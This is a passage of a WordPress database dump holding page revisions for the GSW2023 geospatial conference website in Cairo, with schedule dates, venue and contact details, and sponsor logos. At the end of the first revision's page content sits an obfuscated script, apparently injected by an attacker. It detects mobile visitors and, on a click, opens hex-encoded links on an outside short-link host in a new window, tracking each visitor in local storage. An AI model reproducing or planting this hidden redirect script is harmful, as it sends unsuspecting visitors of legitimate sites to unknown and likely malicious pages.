aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:19:56','2023-08-13 12:19:56','',3066,'https://gsw2023.com/?p=5106',0,'revision','',0),
(5107,1,'2023-08-13 12:20:32','2023-08-13 12:20:32','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsors</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" 